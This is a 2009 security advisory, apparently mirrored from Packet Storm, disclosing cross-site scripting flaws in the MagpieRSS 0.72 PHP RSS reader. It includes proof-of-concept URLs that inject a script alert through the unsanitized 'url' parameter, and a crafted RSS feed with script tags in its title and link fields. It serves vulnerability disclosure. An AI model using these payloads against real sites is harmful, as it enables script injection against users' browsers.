Vulners
Lucene search
MagpieRSS Cross Site Scripting
🗓️ 08 May 2009 00:00:00Reported by Justin C. Klein KeaneType 
packetstorm🔗 packetstormsecurity.com👁 25 Views
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -= MagpieRSS Multiple XSS Vulnerabilities =-
May 6, 2009
Author: Justin C. Klein Keane <[email protected]>
Software: MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested: magpierss-0.72
Vendor notified
Full details can also be found at
http://lampsecurity.org/magpierss-vulnerability
MagpieRSS (http://magpierss.sourceforge.net/) is a PHP based RSS reader.
"MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS
1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie
suffers from multiple cross site scripting (XSS) vulnerabilities. The
first class of vulnerability is due to the failure to sanitize URL
variables in scripts included with the MagpieRSS distribution.
Specifically the $url variable is crafted from $_GET['url'] and used in
display to users in:
magpierss-0.72/scripts/magpie_simple.php
magpierss-0.72/scripts/magpie_debug.php
The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url
variable, but cast from $_GET['rss_url'].
The second class of XSS results from MagpieRSS' failure to sanitize any
of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This
could result in cross site scripting vulnerabilities being injected by
malicious RSS feeds.
- -=Proof of concept=-
The following links can be used to trigger XSS in Magpie's sample scripts:
http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
The following malicious RSS feed can be used to exploit Magpie's RSS
rendering:
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://justin.madirish.net"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>Justin.MadIrish.net <script>alert('xss title');</script>-
Justin's Personal Homepage</title>
<link>http://justin.madirish.net</link>
<description>Close personal friends with Evil Eve.</description>
<language>en</language>
<item>
<title>Disturbing<script>alert('xss title');</script>
XSS<script>alert('xss title');</script></title>
<link>http://justin.madirish.net/node/343 <script>alert('xss
link');</script></link>
<description>foobar</description>
<pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
<dc:creator>justin</dc:creator>
<guid isPermaLink="false">343 at http://justin.madirish.net</guid>
</item>
</channel>
</rss>
- --
Justin C. Klein Keane
http://www.MadIrish.net
http://www.LAMPSecurity.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQD1AwUBSgRhSZEpbGy7DdYAAQKdYQcAqeMh+Xb0tNPOtaNo7cZx/ephiLSwsjYs
ij8noyk1W3ONThKYiGqju9z6493DKhAWSDbXEqkFmZCVquSwYaPNIsCUbza1wC0i
iy01RJPCcjB2jzfj4lCXNaDrzK3SZnsBlRS3jK5AYo3C9/msLA/wiSmpkltVvXxI
G7AIVFOxNVHmhyKtj+jJC0Wv+IoNj1RstKZ3kkEe1RnZsZ5ntv+gxsEkVr/Z7eiM
EmxzZwDvKMHCnuhgMG0ZcZGMcB+DEjLw5keKAvlXojEottZIESoynp4rsF0SVE4G
M5uacRMg93U=
=sY6i
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2009 00:00Current
7.4High risk
Vulners AI Score7.4